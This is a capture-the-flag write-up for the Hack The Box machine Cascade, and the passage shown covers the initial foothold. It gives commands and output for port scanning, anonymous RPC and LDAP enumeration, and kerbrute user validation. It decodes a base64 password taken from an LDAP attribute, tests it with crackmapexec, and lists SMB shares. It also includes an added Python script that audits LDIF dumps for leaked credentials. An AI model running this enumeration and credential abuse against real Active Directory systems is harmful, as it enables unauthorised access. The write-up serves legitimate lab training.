Cascade-htb-writeup

0x00 Skills covered by this box

Skills in this chapter: anonymous RPC login and enumeration, LDAP enumeration, a password leaked through an LDAP user's info attribute, sensitive file disclosure over SMB, VNC password decryption, Audit Share, dnSpy, decompilation, AD Recycle Bin, file recovery, password reuse

Reference: https://0xdf.gitlab.io/2020/07/25/htb-cascade.html

0x01 Getting a user foothold

1. Target IP address: 10.10.10.182

2. Enumerate the open ports

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 -oG allports 10.10.10.182
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-12 20:07 CST
Nmap scan report for 10.10.10.182
Host is up (0.53s latency).
Not shown: 65526 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3269/tcp open globalcatLDAPssl
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49170/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 28.79 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ grep -oP '([0-9]+/open)' allports | awk -F/ '{print $1}' | tr '\n' ','
53,135,139,445,3269,49155,49157,49158,49170,
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p53,135,139,445,3269,49155,49157,49158,49170 -min-rate=10000 -sC -sV 10.10.10.182
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-12 20:14 CST
Nmap scan report for 10.10.10.182
Host is up (0.36s latency).

PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3269/tcp open tcpwrapped
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49170/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -8h01m23s
| smb2-time:
| date: 2024-05-12T04:13:55
|_ start_date: 2024-05-12T03:38:44
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 98.30 seconds


┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 -oG allports1 10.10.10.182 -sU
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-12 20:29 CST
Nmap scan report for 10.10.10.182
Host is up (0.58s latency).
Not shown: 65534 open|filtered udp ports (no-response)
PORT STATE SERVICE
53/udp open domain

Nmap done: 1 IP address (1 host up) scanned in 25.46 seconds

3. Enumeration shows that the RPC service allows anonymous login and enumeration, so the usernames can be pulled directly

┌──(kali㉿offsec)-[~/Desktop]
└─$ rpcclient -U "" -N 10.10.10.182 -c "enumdomusers" | grep -oP "\[.*?\]" | grep -v 0x | tr -d "[]" > users

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat users
CascGuest
arksvc
s.smith
r.thompson
util
j.wakefield
s.hickson
j.goodhand
a.turnbull
e.crowe
b.hanson
d.burman
BackupSvc
j.allen
i.croft

4. Add a local hosts entry, then validate the domain usernames

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.10.182 cascade.local" | sudo tee -a /etc/hosts
[sudo] kali 的密码:
10.10.10.182 cascade.local

┌──(kali㉿offsec)-[~/Desktop/tools]
└─$ ./kerbrute userenum -d cascade.local --dc 10.10.10.182 ../users

__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: dev (n/a) - 05/13/24 - Ronnie Flathers @ropnop

2024/05/13 05:50:15 > Using KDC(s):
2024/05/13 05:50:15 > 10.10.10.182:88

2024/05/13 05:50:20 > [+] VALID USERNAME: j.goodhand@cascade.local
2024/05/13 05:50:20 > [+] VALID USERNAME: s.hickson@cascade.local
2024/05/13 05:50:20 > [+] VALID USERNAME: j.wakefield@cascade.local
2024/05/13 05:50:20 > [+] VALID USERNAME: s.smith@cascade.local
2024/05/13 05:50:20 > [+] VALID USERNAME: util@cascade.local
2024/05/13 05:50:20 > [+] VALID USERNAME: arksvc@cascade.local
2024/05/13 05:50:20 > [+] VALID USERNAME: r.thompson@cascade.local
2024/05/13 05:50:23 > [+] VALID USERNAME: a.turnbull@cascade.local
2024/05/13 05:50:26 > [+] VALID USERNAME: j.allen@cascade.local
2024/05/13 05:50:26 > [+] VALID USERNAME: BackupSvc@cascade.local
2024/05/13 05:50:26 > [+] VALID USERNAME: d.burman@cascade.local
2024/05/13 05:50:26 > Done! Tested 15 usernames (11 valid) in 10.422 seconds

5. After various enumeration, LDAP turns out to allow anonymous searches; on one user's entry we find an account password

┌──(kali㉿offsec)-[~/Desktop]
└─$ ldapsearch -H ldap://10.10.10.182 -x -b "DC=cascade,DC=local" > ldap-anonymous

┌──(kali㉿offsec)-[~/Desktop]
└─$ ldapsearch -H ldap://10.10.10.182 -x -b "DC=cascade,DC=local" '(objectClass=person)' > ldap-people

sAMAccountName: r.thompson
cascadeLegacyPwd: clk0bjVldmE=

6. The password here is base64-encoded; I only realised this when SMB enumeration reported a logon failure

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec smb 10.10.10.182 -u r.thompson -p 'clk0bjVldmE=' --continue-on-success
SMB 10.10.10.182 445 CASC-DC1 [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB 10.10.10.182 445 CASC-DC1 [-] cascade.local\r.thompson:clk0bjVldmE= STATUS_LOGON_FAILURE

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo clk0bjVldmE= | base64 -d
rY4n5eva

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec smb 10.10.10.182 -u r.thompson -p 'rY4n5eva' --continue-on-success
SMB 10.10.10.182 445 CASC-DC1 [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB 10.10.10.182 445 CASC-DC1 [+] cascade.local\r.thompson:rY4n5eva
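As an added example for steps 5 and 6 (written here, not taken from the original writeup or the box), a small defensive audit in Python: it parses the LDIF that ldapsearch emits (folded continuation lines, `::` base64 attributes, comments) and flags attributes such as cascadeLegacyPwd whose name, or whose base64-decoded value, looks like a stored credential. The sample LDIF, its DNs and the second entry are constructed; only the r.thompson attribute/value pair comes from the page.

```python
import base64
import re

# Constructed sample LDIF in the shape of the ldapsearch output above. The r.thompson
# attribute/value pair is the one seen on the box; the DNs, the second entry and its
# folded memberOf line are made up to exercise the parser.
SAMPLE_LDIF = """\
dn: CN=r.thompson,CN=Users,DC=cascade,DC=local
objectClass: person
sAMAccountName: r.thompson
cascadeLegacyPwd: clk0bjVldmE=

dn: CN=s.smith,CN=Users,DC=cascade,DC=local
objectClass: person
sAMAccountName: s.smith
description:: VGVzdCBhY2NvdW50
memberOf: CN=IT,OU=Groups,DC=cascade,DC=l
 ocal
"""

ATTR_LINE = re.compile(r"^([A-Za-z][\w;.-]*)(::?)\s?(.*)$")
SECRET_NAME = re.compile(r"pwd|pass|secret|cred|key", re.I)
B64_ALPHABET = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
# Attributes whose values are identifiers, not candidate secrets.
SKIP_ATTRS = {"dn", "distinguishedname", "samaccountname", "objectclass", "memberof"}


def parse_ldif(text):
    """Parse LDIF into a list of {attribute: [values]} dicts.

    Handles the three LDIF details that grep-based triage misses: folded
    continuation lines (leading space), '#' comments, and 'attr:: value'
    where the value is base64 because it is binary or non-ASCII.
    """
    unfolded = []
    for line in text.splitlines():
        if line.startswith(" ") and unfolded:
            unfolded[-1] += line[1:]          # continuation of the previous line
        else:
            unfolded.append(line)

    entries, current = [], {}
    for line in unfolded:
        if not line.strip():                  # a blank line ends an entry
            if current:
                entries.append(current)
                current = {}
            continue
        if line.startswith("#"):
            continue
        m = ATTR_LINE.match(line)
        if not m:
            continue                          # tolerate lines that are not attr: value
        attr, sep, value = m.groups()
        if sep == "::":
            # objectGUID/objectSid are binary; 'replace' keeps the parser alive on them.
            value = base64.b64decode(value).decode("utf-8", errors="replace")
        current.setdefault(attr, []).append(value)
    if current:
        entries.append(current)
    return entries


def looks_like_base64_text(value):
    """True when value is well-formed base64 that decodes to printable ASCII.

    The length and alphabet checks reject ordinary words and DNs before decoding.
    """
    if len(value) < 8 or len(value) % 4 or not B64_ALPHABET.match(value):
        return False
    try:
        raw = base64.b64decode(value, validate=True)
    except ValueError:                        # binascii.Error is a ValueError
        return False
    return bool(raw) and all(32 <= b < 127 for b in raw)


def find_leaked_secrets(ldif_text):
    """Return one finding per attribute value that looks like a stored credential."""
    findings = []
    for entry in parse_ldif(ldif_text):
        account = entry.get("sAMAccountName", entry.get("dn", ["<no dn>"]))[0]
        for attr, values in entry.items():
            if attr.lower() in SKIP_ATTRS:
                continue
            for value in values:
                by_name = bool(SECRET_NAME.search(attr))
                by_shape = looks_like_base64_text(value)
                if not (by_name or by_shape):
                    continue
                findings.append({
                    "account": account,
                    "attribute": attr,
                    "raw": value,
                    "decoded": base64.b64decode(value).decode() if by_shape else value,
                    "reason": "name" if by_name else "base64",
                })
    return findings


if __name__ == "__main__":
    for f in find_leaked_secrets(SAMPLE_LDIF):
        print(f"{f['account']}: {f['attribute']} = {f['raw']!r} -> {f['decoded']!r} ({f['reason']})")
```

Run against a real dump with `ldapsearch -x -b "DC=cascade,DC=local" > ldap-anonymous` and feed the file's contents to find_leaked_secrets; any hit means an attribute readable by anonymous bind is carrying a credential and should be cleaned up and its ACL tightened.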

7. Using these credentials, enumerate which SMB shares are accessible

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbmap -u 'r.thompson' -p 'rY4n5eva' -H 10.10.10.182

________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)

[+] IP: 10.10.10.182:445 Name: cascade.local Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
Audit$ NO ACCESS
C$ NO ACCESS Default share
Data READ ONLY
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
print$ READ ONLY Printer Drivers
SYSVOL READ ONLY Logon server share

8. I took a shortcut here: I used a recursive directory listing to dump everything at once

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient \\\\10.10.10.182\\Data -U r.thompson%rY4n5eva -c "recurse; ls"
. D 0 Mon Jan 27 11:27:34 2020
.. D 0 Mon Jan 27 11:27:34 2020
Contractors D 0 Mon Jan 13 09:45:11 2020
Finance D 0 Mon Jan 13 09:45:06 2020
IT D 0 Wed Jan 29 02:04:51 2020
Production D 0 Mon Jan 13 09:45:18 2020
Temps D 0 Mon Jan 13 09:45:15 2020

\Contractors
NT_STATUS_ACCESS_DENIED listing \Contractors\*

\Finance
NT_STATUS_ACCESS_DENIED listing \Finance\*

\IT
. D 0 Wed Jan 29 02:04:51 2020
.. D 0 Wed Jan 29 02:04:51 2020
Email Archives D 0 Wed Jan 29 02:00:30 2020
LogonAudit D 0 Wed Jan 29 02:04:40 2020
Logs D 0 Wed Jan 29 08:53:04 2020
Temp D 0 Wed Jan 29 06:06:59 2020

\Production
NT_STATUS_ACCESS_DENIED listing \Production\*

\Temps
NT_STATUS_ACCESS_DENIED listing \Temps\*

\IT\Email Archives
. D 0 Wed Jan 29 02:00:30 2020
.. D 0 Wed Jan 29 02:00:30 2020
Meeting_Notes_June_2018.html An 2522 Wed Jan 29 02:00:12 2020

\IT\LogonAudit
. D 0 Wed Jan 29 02:04:40 2020
.. D 0 Wed Jan 29 02:04:40 2020

\IT\Logs
. D 0 Wed Jan 29 08:53:04 2020
.. D 0 Wed Jan 29 08:53:04 2020
Ark AD Recycle Bin D 0 Sat Jan 11 00:33:45 2020
DCs D 0 Wed Jan 29 08:56:00 2020

\IT\Temp
. D 0 Wed Jan 29 06:06:59 2020
.. D 0 Wed Jan 29 06:06:59 2020
r.thompson D 0 Wed Jan 29 06:06:53 2020
s.smith D 0 Wed Jan 29 04:00:01 2020

\IT\Logs\Ark AD Recycle Bin
. D 0 Sat Jan 11 00:33:45 2020
.. D 0 Sat Jan 11 00:33:45 2020
ArkAdRecycleBin.log A 1303 Wed Jan 29 09:19:11 2020

\IT\Logs\DCs
. D 0 Wed Jan 29 08:56:00 2020
.. D 0 Wed Jan 29 08:56:00 2020
dcdiag.log A 5967 Sat Jan 11 00:17:30 2020

\IT\Temp\r.thompson
. D 0 Wed Jan 29 06:06:53 2020
.. D 0 Wed Jan 29 06:06:53 2020

\IT\Temp\s.smith
. D 0 Wed Jan 29 04:00:01 2020
.. D 0 Wed Jan 29 04:00:01 2020
VNC Install.reg A 2680 Wed Jan 29 03:27:44 2020


┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient \\\\10.10.10.182\\NETLOGON -U r.thompson%rY4n5eva -c "recurse; ls"
. D 0 Thu Jan 16 05:50:33 2020
.. D 0 Thu Jan 16 05:50:33 2020
MapAuditDrive.vbs A 258 Thu Jan 16 05:50:15 2020
MapDataDrive.vbs A 255 Thu Jan 16 05:51:03 2020

6553343 blocks of size 4096. 1613811 blocks available

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient \\\\10.10.10.182\\print$ -U r.thompson%rY4n5eva -c "recurse; ls"
. D 0 Tue Jul 14 13:37:10 2009
.. D 0 Tue Jul 14 13:37:10 2009
color D 0 Tue Jul 14 13:37:10 2009
IA64 D 0 Tue Jul 14 12:58:30 2009
W32X86 D 0 Tue Jul 14 12:58:30 2009
x64 D 0 Mon Jan 13 11:09:11 2020

\color
. D 0 Tue Jul 14 13:37:10 2009
.. D 0 Tue Jul 14 13:37:10 2009
D50.camp A 1058 Thu Jun 11 04:46:16 2009
D65.camp A 1079 Thu Jun 11 04:46:16 2009
Graphics.gmmp A 797 Thu Jun 11 04:46:17 2009
MediaSim.gmmp A 838 Thu Jun 11 04:46:21 2009
Photo.gmmp A 786 Thu Jun 11 04:46:22 2009
Proofing.gmmp A 822 Thu Jun 11 04:46:22 2009
RSWOP.icm A 218103 Thu Jun 11 04:46:22 2009
sRGB Color Space Profile.icm A 3144 Thu Jun 11 04:46:22 2009
wscRGB.cdmp A 17155 Thu Jun 11 04:46:23 2009
wsRGB.cdmp A 1578 Thu Jun 11 04:46:23 2009

\IA64
. D 0 Tue Jul 14 12:58:30 2009
.. D 0 Tue Jul 14 12:58:30 2009

\W32X86
. D 0 Tue Jul 14 12:58:30 2009
.. D 0 Tue Jul 14 12:58:30 2009

\x64
. D 0 Mon Jan 13 11:09:11 2020
.. D 0 Mon Jan 13 11:09:11 2020
3 D 0 Mon Jan 13 11:09:12 2020
PCC D 0 Mon Jan 13 11:12:37 2020

\x64\3
. D 0 Mon Jan 13 11:09:12 2020
.. D 0 Mon Jan 13 11:09:12 2020
brci14a.dll A 712192 Tue Jul 14 09:40:12 2009
BRCI14A.GPD A 10706 Thu Jun 11 04:41:11 2009
brci14a.ini A 61 Thu Jun 11 04:41:11 2009
brci14ui.dll A 127488 Tue Jul 14 09:41:34 2009
BRD116C.BUD A 31632 Fri Jan 10 03:10:10 2020
BRD116C.GPD A 11248 Thu Jun 11 04:41:11 2009
brio14aa.bcm A 127728 Thu Jun 11 04:41:18 2009
brio14ab.bcm A 220536 Thu Jun 11 04:41:18 2009
brio14ac.bcm A 127728 Thu Jun 11 04:41:18 2009
brio14ad.bcm A 132440 Thu Jun 11 04:41:18 2009
brio14af.bcm A 127728 Thu Jun 11 04:41:18 2009
brio14ag.bcm A 220536 Thu Jun 11 04:41:18 2009
brio14ah.bcm A 127728 Thu Jun 11 04:41:18 2009
brio14ai.bcm A 132440 Thu Jun 11 04:41:18 2009
brio14ak.bcm A 127728 Thu Jun 11 04:41:18 2009
brio14al.bcm A 220536 Thu Jun 11 04:41:18 2009
brio14am.bcm A 127728 Thu Jun 11 04:41:18 2009
brio14an.bcm A 132440 Thu Jun 11 04:41:19 2009
en-US D 0 Tue Jul 14 13:41:17 2009
mui D 0 Tue Jul 14 13:41:16 2009
mxdwdrv.dll A 715776 Sat Nov 20 13:27:24 2010
mxdwdui.BUD A 57960 Mon Jan 13 11:09:04 2020
mxdwdui.dll A 221184 Sat Nov 20 13:27:24 2010
mxdwdui.gpd A 67628 Thu Jun 11 04:58:19 2009
mxdwdui.ini A 42 Thu Jun 11 04:58:19 2009
PS5UI.DLL A 847872 Sat Nov 20 13:27:24 2010
PSCRIPT.HLP A 26038 Thu Jun 11 04:40:59 2009
PSCRIPT.NTF A 1062732 Thu Jun 11 04:59:37 2009
PSCRIPT5.DLL A 630272 Sat Nov 20 13:27:24 2010
PS_SCHM.GDL A 5561 Thu Jun 11 04:59:18 2009
STDDTYPE.GDL A 23812 Thu Jun 11 04:59:19 2009
STDNAMES.GPD A 14362 Thu Jun 11 04:59:19 2009
STDSCHEM.GDL A 59116 Thu Jun 11 04:59:19 2009
STDSCHMX.GDL A 2278 Thu Jun 11 04:59:19 2009
TPOG.bin A 415 Sat Mar 22 00:22:54 2014
TPOG.chm A 21583 Sat Mar 22 00:22:52 2014
TPPRN.DLL A 289608 Sat Mar 22 00:22:52 2014
TPPrnUI.DLL A 1693000 Sat Mar 22 00:22:50 2014
TPPrnUIchs.dll A 35144 Sat Mar 22 00:22:52 2014
TPPrnUIcht.dll A 35144 Sat Mar 22 00:22:50 2014
TPPrnUIcsy.dll A 41288 Sat Mar 22 00:22:52 2014
TPPrnUIdeu.dll A 43336 Sat Mar 22 00:22:56 2014
TPPrnUIell.dll A 42312 Sat Mar 22 00:22:50 2014
TPPrnUIesn.dll A 43336 Sat Mar 22 00:22:56 2014
TPPrnUIfra.dll A 43848 Sat Mar 22 00:22:56 2014
TPPrnUIhun.dll A 41288 Sat Mar 22 00:22:56 2014
TPPrnUIita.dll A 43336 Sat Mar 22 00:22:52 2014
TPPrnUIjpn.dll A 37192 Sat Mar 22 00:22:50 2014
TPPrnUIkor.dll A 37192 Sat Mar 22 00:22:54 2014
TPPrnUIplk.dll A 41800 Sat Mar 22 00:22:50 2014
TPPrnUIptb.dll A 42824 Sat Mar 22 00:22:54 2014
TPPrnUIrus.dll A 42312 Sat Mar 22 00:22:50 2014
TPPrnUIsve.dll A 41800 Sat Mar 22 00:22:50 2014
TPPrnUItha.dll A 41288 Sat Mar 22 00:22:54 2014
TPPS.DLL A 154448 Sat Mar 22 00:22:54 2014
TPPS.INI A 60 Sat Mar 22 00:22:54 2014
TPPS.PPD A 7175 Sat Mar 22 00:22:56 2014
UNIDRV.DLL A 479232 Sat Nov 20 13:27:28 2010
unidrv.hlp A 21225 Thu Jun 11 04:40:59 2009
unidrvui.dll A 884224 Sat Nov 20 13:27:24 2010
UNIRES.DLL A 762368 Sat Nov 20 13:09:22 2010
XPSSVCS.DLL A 1576448 Sat Nov 20 13:27:34 2010

\x64\PCC
. D 0 Mon Jan 13 11:12:37 2020
.. D 0 Mon Jan 13 11:12:37 2020
ntprint.inf_amd64_neutral_4616c3de1949be6d.cab A 4073740 Mon Jan 13 11:09:14 2020
oemprint.inf_amd64_neutral_1c61babacbb41e90.cab A 81740 Thu Jan 9 23:27:28 2020
oemprint.inf_amd64_neutral_eb780557355f07b5.cab A 1394271 Thu Jan 9 23:15:49 2020
prnbr009.inf_amd64_neutral_fd2ac5b9c40bd465.cab A 1457321 Fri Jan 10 03:24:37 2020
prnms001.inf_amd64_neutral_9fe8503f82ce60fa.cab A 88480 Mon Jan 13 11:09:15 2020

\x64\3\en-US
. D 0 Tue Jul 14 13:41:17 2009
.. D 0 Tue Jul 14 13:41:17 2009
BRCI06UI.DLL.mui A 6144 Tue Jul 14 10:28:04 2009
brci08ui.dll.mui A 5632 Tue Jul 14 10:23:00 2009
brci14ui.dll.mui A 6144 Tue Jul 14 10:27:54 2009
BRCLUI05.DLL.mui A 6656 Tue Jul 14 10:25:08 2009
BRCLUI06.DLL.mui A 6656 Tue Jul 14 10:30:32 2009
brmzui13.DLL.mui A 3584 Tue Jul 14 10:27:24 2009
BRPTUI2.DLL.mui A 9216 Tue Jul 14 10:27:14 2009
BRUUI23A.DLL.mui A 10240 Tue Jul 14 10:30:06 2009
CNBBR273.DLL.mui A 2048 Tue Jul 14 10:27:02 2009
CNBBR274.DLL.mui A 2048 Tue Jul 14 10:29:50 2009
CNBBR276.DLL.mui A 2048 Tue Jul 14 10:26:50 2009
CNBBR280.DLL.mui A 2048 Tue Jul 14 10:26:34 2009
CNBBR281.DLL.mui A 2048 Tue Jul 14 10:28:20 2009
CNBBR282.DLL.mui A 2048 Tue Jul 14 10:23:12 2009
CNBBR283.DLL.mui A 2048 Tue Jul 14 10:28:16 2009
CNBBR284.DLL.mui A 2048 Tue Jul 14 10:28:12 2009
CNBBR285.DLL.mui A 2048 Tue Jul 14 10:28:44 2009
CNBBR286.DLL.mui A 2048 Tue Jul 14 10:30:26 2009
CNBBR288.DLL.mui A 2048 Tue Jul 14 10:30:02 2009
CNBBR289.DLL.mui A 2048 Tue Jul 14 10:24:44 2009
CNBBR290.DLL.mui A 2048 Tue Jul 14 10:29:40 2009
CNBBR292.DLL.mui A 2048 Tue Jul 14 10:26:46 2009
CNBBR293.DLL.mui A 2048 Tue Jul 14 10:23:38 2009
CNBBR294.DLL.mui A 2048 Tue Jul 14 10:25:26 2009
CNBBR297.DLL.mui A 2048 Tue Jul 14 10:27:40 2009
CNBBR300.DLL.mui A 2048 Tue Jul 14 10:24:10 2009
CNBBR301.DLL.mui A 2048 Tue Jul 14 10:29:58 2009
CNBBR302.DLL.mui A 2048 Tue Jul 14 10:30:08 2009
CNBBR303.DLL.mui A 2048 Tue Jul 14 10:28:18 2009
CNBBR309.DLL.mui A 2048 Tue Jul 14 10:29:46 2009
CNBBR310.DLL.mui A 2048 Tue Jul 14 10:29:14 2009
CNBBR311.DLL.mui A 2048 Tue Jul 14 10:30:08 2009
CNBBR312.DLL.mui A 2048 Tue Jul 14 10:28:20 2009
CNBBR315.DLL.mui A 2048 Tue Jul 14 10:27:22 2009
CNBBR316.DLL.mui A 2048 Tue Jul 14 10:27:20 2009
CNBBR318.DLL.mui A 2048 Tue Jul 14 10:26:10 2009
CNBBR319.DLL.mui A 2048 Tue Jul 14 10:24:44 2009
CNBBR320.DLL.mui A 2048 Tue Jul 14 10:24:56 2009
CNBBR323.DLL.mui A 2048 Tue Jul 14 10:26:06 2009
CNBBR325.DLL.mui A 2048 Tue Jul 14 10:29:08 2009
CNBBR326.DLL.mui A 2048 Tue Jul 14 10:29:56 2009
CNBBR327.DLL.mui A 2048 Tue Jul 14 10:29:42 2009
CNBBR328.DLL.mui A 2048 Tue Jul 14 10:26:44 2009
CNBBR331.DLL.mui A 2048 Tue Jul 14 10:23:02 2009
CNBBR332.DLL.mui A 2048 Tue Jul 14 10:30:18 2009
CNBBR333.DLL.mui A 2048 Tue Jul 14 10:30:18 2009
CNBBR334.DLL.mui A 2048 Tue Jul 14 10:26:02 2009
CNBBR335.DLL.mui A 2048 Tue Jul 14 10:29:46 2009
CNBBR339.DLL.mui A 2048 Tue Jul 14 10:27:14 2009
CNBBR342.DLL.mui A 2048 Tue Jul 14 10:28:52 2009
CNBBR346.DLL.mui A 2048 Tue Jul 14 10:28:54 2009
CNBIC4_1.DLL.mui A 2048 Tue Jul 14 10:28:24 2009
CNBIC4_2.DLL.mui A 2048 Tue Jul 14 10:29:36 2009
CNBIC4_3.DLL.mui A 2048 Tue Jul 14 10:27:36 2009
CNBIC4_4.DLL.mui A 2048 Tue Jul 14 10:26:32 2009
CNBIC4_5.DLL.mui A 2048 Tue Jul 14 10:23:52 2009
CNBIC4_6.DLL.mui A 2048 Tue Jul 14 10:27:28 2009
CNBIC4_7.DLL.mui A 2048 Tue Jul 14 10:28:26 2009
CNBIC4_8.DLL.mui A 2048 Tue Jul 14 10:29:40 2009
CNBMR284.DLL.mui A 2048 Tue Jul 14 10:27:36 2009
CNBMR285.DLL.mui A 2048 Tue Jul 14 10:24:52 2009
CNBMR310.DLL.mui A 2048 Tue Jul 14 10:26:42 2009
CNBPC4_1.DLL.mui A 2048 Tue Jul 14 10:28:44 2009
CNBPC4_2.DLL.mui A 2048 Tue Jul 14 10:27:06 2009
CNBPCOMM.DLL.mui A 2048 Tue Jul 14 10:29:46 2009
CNBPV3.DLL.mui A 2560 Tue Jul 14 10:23:54 2009
CNBPV4.DLL.mui A 2560 Tue Jul 14 10:26:46 2009
CNBP_274.DLL.mui A 2048 Tue Jul 14 10:25:42 2009
CNBP_276.DLL.mui A 2048 Tue Jul 14 10:30:26 2009
CNBP_279.DLL.mui A 2048 Tue Jul 14 10:24:24 2009
CNBP_280.DLL.mui A 2048 Tue Jul 14 10:27:18 2009
CNBP_281.DLL.mui A 2048 Tue Jul 14 10:26:10 2009
CNBP_282.DLL.mui A 2048 Tue Jul 14 10:29:28 2009
CNBP_283.DLL.mui A 2048 Tue Jul 14 10:23:04 2009
CNBP_284.DLL.mui A 2048 Tue Jul 14 10:24:08 2009
CNBP_285.DLL.mui A 2048 Tue Jul 14 10:25:00 2009
CNBP_286.DLL.mui A 2048 Tue Jul 14 10:26:58 2009
CNBP_287.DLL.mui A 2048 Tue Jul 14 10:29:44 2009
CNBP_288.DLL.mui A 2048 Tue Jul 14 10:30:14 2009
CNBP_289.DLL.mui A 2048 Tue Jul 14 10:26:18 2009
CNBP_290.DLL.mui A 2048 Tue Jul 14 10:24:10 2009
CNBP_291.DLL.mui A 2048 Tue Jul 14 10:26:26 2009
CNBP_292.DLL.mui A 2048 Tue Jul 14 10:30:16 2009
CNBP_293.DLL.mui A 2048 Tue Jul 14 10:29:02 2009
CNBP_294.DLL.mui A 2048 Tue Jul 14 10:29:20 2009
CNBP_295.DLL.mui A 2048 Tue Jul 14 10:23:58 2009
CNBP_297.DLL.mui A 2048 Tue Jul 14 10:24:30 2009
CNBP_298.DLL.mui A 2048 Tue Jul 14 10:29:26 2009
CNBP_300.DLL.mui A 2048 Tue Jul 14 10:24:36 2009
CNBP_301.DLL.mui A 2048 Tue Jul 14 10:29:36 2009
CNBP_302.DLL.mui A 2048 Tue Jul 14 10:24:06 2009
CNBP_303.DLL.mui A 2048 Tue Jul 14 10:29:44 2009
CNBP_309.DLL.mui A 2048 Tue Jul 14 10:24:46 2009
CNBP_310.DLL.mui A 2048 Tue Jul 14 10:29:50 2009
CNBP_311.DLL.mui A 2048 Tue Jul 14 10:30:06 2009
CNBP_312.DLL.mui A 2048 Tue Jul 14 10:30:16 2009
CNBP_315.DLL.mui A 2048 Tue Jul 14 10:28:30 2009
CNBP_316.DLL.mui A 2048 Tue Jul 14 10:26:14 2009
CNBP_317.DLL.mui A 2048 Tue Jul 14 10:28:18 2009
CNBP_318.DLL.mui A 2048 Tue Jul 14 10:25:22 2009
CNBP_319.DLL.mui A 2048 Tue Jul 14 10:30:24 2009
CNBP_320.DLL.mui A 2048 Tue Jul 14 10:29:10 2009
CNBP_321.DLL.mui A 2048 Tue Jul 14 10:28:42 2009
CNBP_323.DLL.mui A 2048 Tue Jul 14 10:24:36 2009
CNBP_324.DLL.mui A 2048 Tue Jul 14 10:24:52 2009
CNBP_325.DLL.mui A 2048 Tue Jul 14 10:29:48 2009
CNBP_326.DLL.mui A 2048 Tue Jul 14 10:29:18 2009
CNBP_327.DLL.mui A 2048 Tue Jul 14 10:28:56 2009
CNBP_328.DLL.mui A 2048 Tue Jul 14 10:28:34 2009
CNBP_329.DLL.mui A 2048 Tue Jul 14 10:30:34 2009
CNBP_331.DLL.mui A 2048 Tue Jul 14 10:28:14 2009
CNBP_332.DLL.mui A 2048 Tue Jul 14 10:26:40 2009
CNBP_333.DLL.mui A 2048 Tue Jul 14 10:28:00 2009
CNBP_334.DLL.mui A 2048 Tue Jul 14 10:23:38 2009
CNBP_335.DLL.mui A 2048 Tue Jul 14 10:29:30 2009
CNBP_336.DLL.mui A 2048 Tue Jul 14 10:30:32 2009
CNBP_337.DLL.mui A 2048 Tue Jul 14 10:27:22 2009
CNBP_338.DLL.mui A 2048 Tue Jul 14 10:29:42 2009
CNBP_339.DLL.mui A 2048 Tue Jul 14 10:29:56 2009
CNBP_340.DLL.mui A 2048 Tue Jul 14 10:27:40 2009
CNBP_341.DLL.mui A 2048 Tue Jul 14 10:27:34 2009
CNBP_342.DLL.mui A 2048 Tue Jul 14 10:24:42 2009
CNBP_346.DLL.mui A 2048 Tue Jul 14 10:24:36 2009
CNN0B007.DLL.mui A 2048 Tue Jul 14 10:25:40 2009
EP7RES00.DLL.mui A 4096 Tue Jul 14 10:28:08 2009
EP7RES01.DLL.mui A 3584 Tue Jul 14 10:28:26 2009
